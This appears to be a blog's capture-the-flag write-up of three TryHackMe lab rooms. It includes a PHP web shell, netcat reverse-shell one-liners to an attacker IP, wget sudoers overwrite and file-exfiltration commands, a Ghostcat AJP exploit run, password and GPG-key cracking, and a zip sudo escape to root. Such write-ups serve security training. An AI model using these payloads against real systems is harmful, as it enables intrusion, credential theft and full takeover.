wp-tryhackme-easy-lazyadmin&wgelctf&tomghost

Posted on In Views: Disqus: Word count in article: 689 Reading time ≈ 3 mins.
some web

lazyadmin

lazyadmin

1
2
3
# nmap option
nmap -F -sn -sV
   # fast online service

browser addon hacktools

browser source code ctrl + u

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
❯ nmap 10.10.136.56 -p80 -sV
...
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))


❯ nmap 10.10.136.56 -F
...
PORT   STATE SERVICE
22/tcp open  ssh
53/tcp open  domain
80/tcp open  http

dirb http://10.10.136.56/

URL_BASE: http://10.10.136.56/
http://10.10.136.56/content/
+ http://10.10.136.56/index.html (CODE:200|SIZE:11321)
+ http://10.10.136.56/server-status (CODE:403|SIZE:278)
==> DIRECTORY: http://10.10.136.56/content/_themes/
==> DIRECTORY: http://10.10.136.56/content/as/
==> DIRECTORY: http://10.10.136.56/content/attachment/
==> DIRECTORY: http://10.10.136.56/content/images/
==> DIRECTORY: http://10.10.136.56/content/inc/
+ http://10.10.136.56/content/index.php (CODE:200|SIZE:2199)
==> DIRECTORY: http://10.10.136.56/content/js/
    (Possible cause: COULDNT CONNECT)

# in sql file
# username manager
# use crackstation
# password Password123

<?php system($_GET["cmd"]);?>

sudo -l

# reverse shell revshells.com
# rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%2010.9.0.78%205555%20%3E%2Ftmp%2Ff

$ cat /etc/copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.0.78 5554 >/tmp/f

sudo /usr/bin/perl /home/itguy/backup.pl

rlwrap nc -lvnp 5554 -s 10.9.0.78l

Wgel CTF

wgelctf

1
2
3
4
5
6
❯ nmap 10.10.120.10 -F
...
PORT   STATE SERVICE
22/tcp open  ssh
53/tcp open  domain
80/tcp open  http
1
2
3
4
❯ nmap 10.10.120.10 -sV -p80
...
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
...

web source code username Jessie

1
2
3
4
5
6
7
❯ gobuster dir --url http://10.10.120.10/ --wordlist /usr/share/dirb/wordlists/big.txt
...
/.htaccess            (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/server-status        (Status: 403) [Size: 277]
/sitemap              (Status: 301) [Size: 314] [--> http://10.10.120.10/sitemap/]
...
1
2
3
4
5
6
7
8
9
10
❯ gobuster dir -u http://10.10.120.10/sitemap/ -w /usr/share/dirb/wordlists/big.txt
...
/.htpasswd            (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/.ssh                 (Status: 301) [Size: 319] [--> http://10.10.120.10/sitemap/.ssh/]
/css                  (Status: 301) [Size: 318] [--> http://10.10.120.10/sitemap/css/]
/fonts                (Status: 301) [Size: 320] [--> http://10.10.120.10/sitemap/fonts/]
/images               (Status: 301) [Size: 321] [--> http://10.10.120.10/sitemap/images/]
/js                   (Status: 301) [Size: 317] [--> http://10.10.120.10/sitemap/js/]
...
1
2
3
4
5
# do not uppercase there
ssh -i id_rsa Jessie@10.10.120.10

ssh -i id_rsa jessie@10.10.120.10

1
2
3
4
jessie@CorpOne:~$ sudo -l
...
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/wget

search GTFOBins

sudoers file download, modify, and upload

wget

1
2
3
4
5
wget --post-file=$LFILE $URL

python -m http.server

wget http://hostip:8000/sudoers -O /etc/sudoers

tomghost

tomghost

1
2
3
4
5
6
7
8
9
10
11
12
❯ nmap 10.10.189.103 -F
22/tcp   open  ssh
53/tcp   open  domain
8009/tcp open  ajp13
8080/tcp open  http-proxy


❯ nmap 10.10.189.103 -p 8080,8009 -sV
...
8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)
8080/tcp open  http    Apache Tomcat 9.0.30

1
2
3
4
5
6
7
8
9
10
11
12
# useless gobuster
❯ gobuster dir -u http://10.10.189.103:8080/ -w /usr/share/dirb/wordlists/big.txt
...
/[                    (Status: 400) [Size: 762]
/]                    (Status: 400) [Size: 762]
/docs                 (Status: 302) [Size: 0] [--> /docs/]
/examples             (Status: 302) [Size: 0] [--> /examples/]
/favicon.ico          (Status: 200) [Size: 21630]
/manager              (Status: 302) [Size: 0] [--> /manager/]
/plain]               (Status: 400) [Size: 762]
/quote]               (Status: 400) [Size: 762]
...
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
# after searchexploit and -m
❯ python2 48143.py -f WEB-INF/web.xml -p 8009 10.10.189.103
Getting resource at ajp13://10.10.189.103:8009/asdf
----------------------------
<?xml version="1.0" encoding="UTF-8"?>
    ...
	skyfuck:8730281lkjlkjdqlksalks
	...
</web-app>

# ssh to skyf.
# get flag1
skyfuck@ubuntu:~$ cat /home/merlin/user.txt

# useless but check the suid commond (from hacktools
skyfuck@ubuntu:~$ find / -user root -perm /4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/vmware-user-suid-wrapper
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/bin/mount
/bin/ping
/bin/umount
/bin/fusermount
/bin/su
/bin/ping6

# scp the file in home
❯ scp 'skyfuck@10.10.189.103:/home/skyfuck/*' .

❯ gpg2john tryhackme.asc > hash

❯ john ./hash --wordlist=/usr/share/wordlists/passwords/rockyou.txt
...
alexandru        (tryhackme)
...

# remember remove later if you use openvpn
sudo gpg --import tryhackme.asc

❯ gpg -d credential.pgp
...
merlin:password%

❯ ssh merlin@10.10.189.103
    merlin@ubuntu:~$ sudo -l
    ...
    (root : root) NOPASSWD: /usr/bin/zip


# GTFOBins again
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF


# flag2
cat root.txt